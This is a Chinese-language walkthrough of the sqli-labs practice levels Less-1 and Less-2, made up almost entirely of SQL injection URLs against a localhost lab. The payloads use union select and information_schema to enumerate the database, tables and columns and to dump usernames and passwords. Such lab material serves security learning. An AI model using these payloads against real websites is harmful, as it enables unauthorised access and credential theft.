sqli-labs
Less-1
1.寻找注入点
http://127.0.0.1/sqli/Less-1/?id=1' //报错
http://127.0.0.1/sqli/Less-1/?id=1' and 1=1 --+ //正常
http://127.0.0.1/sqli/Less-1/?id=1' and 1=2 --+ //报错
http://127.0.0.1/sqli/Less-1/?id=1' order by 4 --+ //报错,所以字段数是3
http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,2,3 --+ //2,3有回显
2.爆数据库
http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,database(),user() --+
3.爆数据表
http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema='security' --+
4.爆字段
http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,database(),group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' --+
5.爆数据
http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,2,group_concat(id,username,password) from users --+
Less-2
1.寻找注入点
http://127.0.0.1/sqli/Less-2/?id=1' //报错
http://127.0.0.1/sqli/Less-2/?id=1 and 1=1 //正常
http://127.0.0.1/sqli/Less-2/?id=1 and 1=2 //报错
http://127.0.0.1/sqli/Less-2/?id=1 order by 4 //报错,字段数为3
http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,2,3
2.爆库
http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,2,database()
3.爆表
http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'
4.爆字段
http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'
5.爆数据
http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,2,group_concat(id,username,password,0x10) from users